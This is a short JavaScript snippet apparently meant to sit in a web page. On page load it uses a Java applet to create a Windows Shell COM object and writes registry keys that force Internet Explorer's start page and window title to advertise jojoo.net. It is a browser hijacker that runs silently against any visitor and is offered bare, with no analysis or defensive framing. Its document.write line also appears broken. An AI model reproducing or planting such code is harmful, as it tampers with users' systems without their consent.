<script language=JavaScript>
 document.write("
"); 
function f(){ 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Shl = a1.GetObject(); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.jojoo.net"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "★- http://www.jojoo.net-★★-细溪驿站-★"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "★- http://www.jojoo.net-★★-细溪驿站-★"); 
} 
function init() 
{ 
setTimeout("f()", 1000); 
} 
init(); 
</script>